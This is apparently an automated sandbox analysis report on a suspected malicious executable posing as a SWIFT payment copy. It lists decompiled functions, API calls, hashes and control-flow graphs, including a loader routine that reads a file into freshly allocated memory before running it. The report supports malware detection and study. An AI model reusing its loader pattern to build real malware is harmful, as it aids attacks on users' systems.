                                                                                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 004035A6
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 1100898210-4083868402
                                                                                                                        • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                                                        • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                                                                                        • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                                                        • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405701 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 00405707
                                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,80000000,00000003), ref: 00405715
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-1876063424
                                                                                                                        • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                        • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                                                                                        • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                        • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405813 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405833
                                                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                        • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                                                                                        • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                        • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:4.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:0%
                                                                                                                        Total number of Nodes:194
                                                                                                                        Total number of Limit Nodes:5
                                                                                                                        execution_graph 16433 407237 16436 40723f 16433->16436 16434 40b126 _malloc 68 API calls 16434->16436 16435 407259 16436->16434 16436->16435 16437 40dbc6 __calloc_impl DecodePointer 16436->16437 16438 40725b std::exception::exception 16436->16438 16437->16436 16439 4088f0 __CxxThrowException@8 RaiseException 16438->16439 16440 407285 16439->16440 14481 4094d2 14482 4094de __getstream 14481->14482 14516 40e494 GetProcessHeap 14482->14516 14484 409533 14485 40953e 14484->14485 14615 409626 14484->14615 14517 41032d 14485->14517 14516->14484 14636 40ddd0 EncodePointer 14517->14636 14616 409632 14615->14616 14617 409637 14615->14617 14619 40d7ca __FF_MSGBANNER 68 API calls 14616->14619 14618 40d827 __NMSG_WRITE 68 API calls 14617->14618 14620 40963f 14618->14620 14619->14617 14621 40dcdb _doexit 3 API calls 14620->14621 14622 409649 14621->14622 14622->14485 14637 40dde1 __init_pointers __initp_misc_winsig 14636->14637 14640 41048b EncodePointer 14637->14640 14639 40ddff 14640->14639 17443 408cf8 17446 40a427 17443->17446 17447 4101f3 ___pctype_func 68 API calls 17446->17447 17448 40a432 17447->17448 17449 40a473 17448->17449 17452 40a494 17448->17452 17453 408d1e 17448->17453 17449->17453 17454 40a34e 17449->17454 17452->17453 17464 409b7c 17452->17464 17455 40a35a __getstream 17454->17455 17456 4101f3 ___pctype_func 68 API calls 17455->17456 17463 40a37a __CallSettingFrame@12 17456->17463 17457 40a3e8 17528 40a40d 17457->17528 17461 40a3fe __getstream 17461->17453 17462 41040c CallUnexpected 73 API calls 17462->17461 17463->17457 17522 41040c 17463->17522 17465 409b9c 17464->17465 17466 41040c CallUnexpected 73 API calls 17465->17466 17468 409bb7 17465->17468 17466->17468 17467 409e80 17469 409ea4 17467->17469 17471 409e8d 17467->17471 17521 409ca1 type_info::operator== 17467->17521 17468->17467 17473 4101f3 ___pctype_func 68 API calls 17468->17473 17475 409c9b 17468->17475 17470 4101f3 ___pctype_func 68 API calls 17469->17470 17472 409eac 17470->17472 17559 409f17 17471->17559 17477 409eb9 17472->17477 17481 41040c CallUnexpected 73 API calls 17472->17481 17478 409bfd 17473->17478 17474 410444 IsInExceptionSpec 72 API calls 17479 409ec3 ___DestructExceptionObject 17474->17479 17475->17467 17480 409d1d 17475->17480 17475->17521 17477->17453 17478->17477 17483 4101f3 ___pctype_func 68 API calls 17478->17483 17485 408798 std::exception::exception 68 API calls 17479->17485 17487 409e16 ___DestructExceptionObject 17480->17487 17543 408b53 17480->17543 17481->17477 17484 409c0e 17483->17484 17486 4101f3 ___pctype_func 68 API calls 17484->17486 17488 409ee0 17485->17488 17495 409c19 FindHandler 17486->17495 17487->17469 17491 40a031 IsInExceptionSpec 73 API calls 17487->17491 17489 4088f0 __CxxThrowException@8 RaiseException 17488->17489 17518 409e6b 17489->17518 17490 409d3a ___TypeMatch 17490->17487 17549 409ab4 17490->17549 17492 409e4b 17491->17492 17492->17469 17493 409e51 17492->17493 17497 4101f3 ___pctype_func 68 API calls 17493->17497 17499 41040c CallUnexpected 73 API calls 17495->17499 17503 409c39 17495->17503 17496 409c6c 17502 4101f3 ___pctype_func 68 API calls 17496->17502 17500 409e56 17497->17500 17498 409efd 17501 40a34e ___FrameUnwindToState 73 API calls 17498->17501 17499->17503 17504 4101f3 ___pctype_func 68 API calls 17500->17504 17505 409f0b 17501->17505 17506 409c71 17502->17506 17503->17496 17511 41040c CallUnexpected 73 API calls 17503->17511 17507 409e5b 17504->17507 17575 409a74 17505->17575 17506->17475 17512 4101f3 ___pctype_func 68 API calls 17506->17512 17509 4101f3 ___pctype_func 68 API calls 17507->17509 17513 409e60 17509->17513 17511->17496 17514 409c7e 17512->17514 17516 4101f3 ___pctype_func 68 API calls 17513->17516 17517 4101f3 ___pctype_func 68 API calls 17514->17517 17516->17518 17519 409c8c 17517->17519 17574 408c02 RtlUnwind 17518->17574 17534 40a031 17519->17534 17521->17474 17521->17479 17533 40dfd0 17522->17533 17524 410418 DecodePointer 17527 410428 17524->17527 17525 410444 IsInExceptionSpec 72 API calls 17526 410443 17525->17526 17527->17525 17529 4101f3 ___pctype_func 68 API calls 17528->17529 17530 40a412 17529->17530 17531 40a3f4 17530->17531 17532 4101f3 ___pctype_func 68 API calls 17530->17532 17531->17461 17531->17462 17532->17531 17533->17524 17535 40a040 ___TypeMatch 17534->17535 17536 40a0ac 17534->17536 17535->17475 17537 41040c CallUnexpected 73 API calls 17536->17537 17538 40a0b1 17537->17538 17539 410444 IsInExceptionSpec 72 API calls 17538->17539 17540 40a0b6 17539->17540 17541 4101f3 ___pctype_func 68 API calls 17540->17541 17542 40a0bc 17541->17542 17542->17475 17544 408ba8 17543->17544 17548 408b73 17543->17548 17545 408bc4 17544->17545 17546 41040c CallUnexpected 73 API calls 17544->17546 17545->17490 17546->17545 17547 41040c CallUnexpected 73 API calls 17547->17548 17548->17544 17548->17547 17550 409ac1 17549->17550 17551 409ad0 17549->17551 17585 40a0ed 17550->17585 17589 408c02 RtlUnwind 17551->17589 17554 409ae7 17555 40a34e ___FrameUnwindToState 73 API calls 17554->17555 17556 409af9 17555->17556 17590 4098a6 17556->17590 17558 409b1d FindHandlerForForeignException 17558->17490 17560 409f2c 17559->17560 17569 40a02c 17559->17569 17561 4101f3 ___pctype_func 68 API calls 17560->17561 17562 409f33 17561->17562 17563 409f7c 17562->17563 17564 409f3f EncodePointer 17562->17564 17565 409f92 17563->17565 17567 41040c CallUnexpected 73 API calls 17563->17567 17563->17569 17566 4101f3 ___pctype_func 68 API calls 17564->17566 17568 408b53 _GetRangeOfTrysToCheck 73 API calls 17565->17568 17570 409f4e 17566->17570 17567->17565 17572 409fa6 17568->17572 17569->17469 17570->17563 17633 408a7e 17570->17633 17572->17569 17573 409ab4 FindHandlerForForeignException 74 API calls 17572->17573 17573->17572 17574->17498 17576 409a80 __EH_prolog3_catch 17575->17576 17577 4101f3 ___pctype_func 68 API calls 17576->17577 17578 409a85 17577->17578 17579 409a93 17578->17579 17580 41040c CallUnexpected 73 API calls 17578->17580 17581 4101f3 ___pctype_func 68 API calls 17579->17581 17580->17579 17582 409aa1 17581->17582 17583 4088f0 __CxxThrowException@8 RaiseException 17582->17583 17584 409ab3 17583->17584 17586 40a0f9 __getstream 17585->17586 17604 40a17b 17586->17604 17588 40a124 ___BuildCatchObject ___AdjustPointer __getstream 17588->17551 17589->17554 17591 4098b2 __getstream 17590->17591 17608 408c55 17591->17608 17594 4101f3 ___pctype_func 68 API calls 17595 4098df 17594->17595 17596 4101f3 ___pctype_func 68 API calls 17595->17596 17597 4098ed 17596->17597 17598 4101f3 ___pctype_func 68 API calls 17597->17598 17599 4098fb 17598->17599 17600 4101f3 ___pctype_func 68 API calls 17599->17600 17601 409906 _CallCatchBlock2 17600->17601 17613 4099f5 17601->17613 17603 4099e7 __getstream 17603->17558 17606 40a187 FindHandler __getstream 17604->17606 17605 41040c CallUnexpected 73 API calls 17607 40a1f2 ___AdjustPointer _memmove __getstream 17605->17607 17606->17605 17606->17607 17607->17588 17609 4101f3 ___pctype_func 68 API calls 17608->17609 17610 408c66 17609->17610 17611 4101f3 ___pctype_func 68 API calls 17610->17611 17612 408c74 17611->17612 17612->17594 17622 408c7f 17613->17622 17616 4101f3 ___pctype_func 68 API calls 17617 409a09 17616->17617 17618 4101f3 ___pctype_func 68 API calls 17617->17618 17619 409a17 17618->17619 17621 409a5e ___DestructExceptionObject 17619->17621 17630 408ccf 17619->17630 17621->17603 17623 4101f3 ___pctype_func 68 API calls 17622->17623 17624 408c88 17623->17624 17625 408c93 17624->17625 17626 408ca4 17624->17626 17627 4101f3 ___pctype_func 68 API calls 17625->17627 17628 4101f3 ___pctype_func 68 API calls 17626->17628 17629 408c98 17627->17629 17628->17629 17629->17616 17631 4101f3 ___pctype_func 68 API calls 17630->17631 17632 408cd7 17631->17632 17632->17621 17634 408aa0 17633->17634 17635 408a8e 17633->17635 17636 4101f3 ___pctype_func 68 API calls 17634->17636 17635->17563 17636->17635

                                                                                                                        Executed Functions

                                                                                                                        Function 004278B7 Relevance: 6.4, APIs: 4, Instructions: 450COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 256 4278b7-427a7f call 42705f call 427838 call 427073 * 8 278 427a81 256->278 279 427a86-427a96 256->279 280 427e3c-427e3f 278->280 282 427a98 279->282 283 427a9d-427ac0 CreateFileW 279->283 282->280 284 427ac2 283->284 285 427ac7-427af0 VirtualAlloc ReadFile 283->285 284->280 286 427af2 285->286 287 427af7-427b0a 285->287 286->280 289 427b10-427e21 287->289 290 427e26-427e35 call 42720a 287->290 293 427e37-427e39 ExitProcess 290->293
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocNumaVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4233825816-0
                                                                                                                        • Opcode ID: b8b7f096ccaa61c582e6b78d6fd51ea852071ff2e7dabea195a3bef84752b8c9
                                                                                                                        • Instruction ID: 53d47097a5bfde52ef4fcd3898ac9504fef6b0b621f165ef638ed3045f3effa7
                                                                                                                        • Opcode Fuzzy Hash: b8b7f096ccaa61c582e6b78d6fd51ea852071ff2e7dabea195a3bef84752b8c9
                                                                                                                        • Instruction Fuzzy Hash: EB12C620D5D3D8ADDF12CBE994117FCBFB09F1A201F1841CAE494E6292D27A478ADB25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004277DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 349 4277da-427820 call 42705f call 427073 GetSystemInfo 355 427822-427825 349->355 356 427829 349->356 357 42782b-42782e 355->357 356->357
                                                                                                                        APIs
                                                                                                                        • GetSystemInfo.KERNELBASE(?), ref: 004277F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 31276548-0
                                                                                                                        • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                        • Instruction ID: 706cbce307ffb63600e87970b96d6b4f0bc5ec7a3bd5c6fe1ebcb70948ef7adb
                                                                                                                        • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                        • Instruction Fuzzy Hash: 16F0A771F18118ABDB08F6B8A8496BEB7ACDB09241F50456EE606E2241E938854182A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040F174 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 40f174-40f1a1 call 40dfd0 call 409657 call 40af53 7 40f1a3-40f1b9 call 413be0 0->7 8 40f1be-40f1c3 0->8 14 40f413-40f418 call 40e015 7->14 10 40f1c9-40f1d0 8->10 12 40f1d2-40f201 10->12 13 40f203-40f212 GetStartupInfoW 10->13 12->10 15 40f341-40f347 13->15 16 40f218-40f21d 13->16 17 40f405-40f411 call 40f419 15->17 18 40f34d-40f35e 15->18 16->15 20 40f223-40f23a 16->20 17->14 21 40f360-40f363 18->21 22 40f373-40f379 18->22 25 40f241-40f244 20->25 26 40f23c-40f23e 20->26 21->22 27 40f365-40f36e 21->27 28 40f380-40f387 22->28 29 40f37b-40f37e 22->29 31 40f247-40f24d 25->31 26->25 32 40f3ff-40f400 27->32 33 40f38a-40f396 GetStdHandle 28->33 29->33 34 40f26f-40f277 31->34 35 40f24f-40f260 call 40af53 31->35 32->15 38 40f398-40f39a 33->38 39 40f3dd-40f3f3 33->39 37 40f27a-40f27c 34->37 44 40f2f4-40f2fb 35->44 45 40f266-40f26c 35->45 37->15 42 40f282-40f287 37->42 38->39 43 40f39c-40f3a5 GetFileType 38->43 39->32 41 40f3f5-40f3f8 39->41 41->32 46 40f2e1-40f2f2 42->46 47 40f289-40f28c 42->47 43->39 48 40f3a7-40f3b1 43->48 52 40f301-40f30f 44->52 45->34 46->37 47->46 49 40f28e-40f292 47->49 50 40f3b3-40f3b9 48->50 51 40f3bb-40f3be 48->51 49->46 53 40f294-40f296 49->53 54 40f3c6 50->54 55 40f3c0-40f3c4 51->55 56 40f3c9-40f3db InitializeCriticalSectionAndSpinCount 51->56 57 40f311-40f333 52->57 58 40f335-40f33c 52->58 59 40f2a6-40f2db InitializeCriticalSectionAndSpinCount 53->59 60 40f298-40f2a4 GetFileType 53->60 54->56 55->54 56->32 57->52 58->31 61 40f2de 59->61 60->59 60->61 61->46
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0040F182
                                                                                                                          • Part of subcall function 00409657: __mtinitlocknum.LIBCMT ref: 00409669
                                                                                                                          • Part of subcall function 00409657: EnterCriticalSection.KERNEL32(00000000,?,004102C3,0000000D), ref: 00409682
                                                                                                                        • __calloc_crt.LIBCMT ref: 0040F193
                                                                                                                          • Part of subcall function 0040AF53: __calloc_impl.LIBCMT ref: 0040AF62
                                                                                                                          • Part of subcall function 0040AF53: Sleep.KERNEL32(00000000), ref: 0040AF79
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0040F1AE
                                                                                                                        • GetStartupInfoW.KERNEL32(?,00425DF0,00000064,0040955E,00425B90,00000014), ref: 0040F207
                                                                                                                        • __calloc_crt.LIBCMT ref: 0040F252
                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 0040F299
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0040F2D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1426640281-0
                                                                                                                        • Opcode ID: ae35ee6b4152e8b83eb8d66e44fadc031df11e04c01e53283fde62825743bdde
                                                                                                                        • Instruction ID: 0a76cea15fbdb3135e01faac910f22e307834fbe7792fe5c64dcef9aa96c9c5a
                                                                                                                        • Opcode Fuzzy Hash: ae35ee6b4152e8b83eb8d66e44fadc031df11e04c01e53283fde62825743bdde
                                                                                                                        • Instruction Fuzzy Hash: 3781B2719047458FCB24CF69C8406AEBBB4AF09334B24427ED8A6BB7D1C7399807CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00427E40 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 62 427e40-427f10 call 42705f call 427073 * 7 call 427109 CreateFileW 81 427f16-427f21 62->81 82 427fef 62->82 81->82 87 427f27-427f37 VirtualAlloc 81->87 83 427ff1-427ff6 82->83 85 427ff8 83->85 86 427ffc-428001 83->86 85->86 91 42801d-428020 86->91 87->82 88 427f3d-427f4c ReadFile 87->88 88->82 90 427f52-427f71 VirtualAlloc 88->90 94 427f73-427f86 call 4270da 90->94 95 427feb-427fed 90->95 92 428022-428027 91->92 93 428003-428007 91->93 96 428034-42803c 92->96 97 428029-428031 VirtualFree 92->97 99 428013-428015 93->99 100 428009-428011 93->100 104 427fc1-427fd1 call 427073 94->104 105 427f88-427f93 94->105 95->83 97->96 102 428017-42801a 99->102 103 42801c 99->103 100->91 102->91 103->91 104->83 110 427fd3-427fd8 104->110 106 427f96-427fbf call 4270da 105->106 106->104 112 427fda-427fdb FindCloseChangeNotification 110->112 113 427fde-427fe9 VirtualFree 110->113 112->113 113->91
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,004286D6,7FAB7E30), ref: 00427F06
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040), ref: 00427F30
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000), ref: 00427F47
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040), ref: 00427F69
                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040,?,00000000,0000000E), ref: 00427FDB
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040,?), ref: 00427FE6
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040,?), ref: 00428031
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 656311269-0
                                                                                                                        • Opcode ID: e6f59a02c790e7858bcf3759a387b16fdb12c91edd1e15030f84f5e2e71b5922
                                                                                                                        • Instruction ID: 6266934b2078da6189580f367f1e397daed4fb87531158c690dffcb29b397f6d
                                                                                                                        • Opcode Fuzzy Hash: e6f59a02c790e7858bcf3759a387b16fdb12c91edd1e15030f84f5e2e71b5922
                                                                                                                        • Instruction Fuzzy Hash: E0519071F08328ABDB209FB5EC45BAEB7B9AF05710F51455AF900F7280E77899058B68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0042720A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
